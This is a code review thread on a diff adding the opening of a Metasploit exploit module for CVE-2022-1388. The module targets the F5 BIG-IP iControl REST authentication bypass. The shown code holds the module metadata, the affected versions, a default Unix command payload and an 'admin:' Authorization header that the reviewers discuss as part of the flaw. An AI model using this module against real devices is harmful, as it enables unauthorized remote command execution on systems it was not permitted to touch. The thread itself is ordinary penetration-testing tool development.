modules/exploits/linux/http/f5_icontrol_rce.rb

```diff
@@ -0,0 +1,81 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Undisclosed requests may bypass iControl REST authentication',
+        'Description' => %q{
+          On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1,
+          14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x
+          and 11.6.x versions, undisclosed requests may bypass iControl REST authentication.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Heyder Andrade' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2022-1388'],
+          ['URL', 'https://support.f5.com/csp/article/K23605346']
+        ],
+        'Platform' => ['unix'],
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          ['F5 iControl', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' } }]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2022-05-05',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
+        OptString.new('Authorization', [true, 'Username and Password to be sent in the Authorization header', 'admin:'])
```

Comment:
As I understand the vulnerability, this header value is part of it. The `HttpUsername` and `HttpPassword` options are typically used to construct the authorization header. Either the value should be hard coded and those options should be deregistered, or the `HttpUsername` should default to `admin` to allow users to leverage this module if they know the credentials.

Reply:
Possibly:

https://github.com/rapid7/metasploit-framework/blob/5a04f8253cbdf04f94b28e30dd89478613c1ee25/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb#L99-L101